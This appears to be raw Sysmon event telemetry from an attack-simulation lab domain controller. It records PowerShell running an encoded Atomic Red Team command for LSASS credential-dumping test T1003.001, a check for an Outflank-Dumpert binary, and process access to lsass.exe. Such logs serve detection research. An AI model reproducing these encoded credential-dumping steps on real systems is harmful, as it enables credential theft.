15:52:52.002{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004401Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.008{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004528Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.973{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.973{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004526Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.942{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0i0vw44w.50d.ps12020-11-03 15:52:53.942 10341000x80000000000000004525Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004524Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004523Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004521Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004520Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004519Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004518Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004517Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004516Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004515Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004513Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004512Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.895{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004511Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.902{D28789B6-7CD5-5FA1-E200-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (python --version) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004510Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 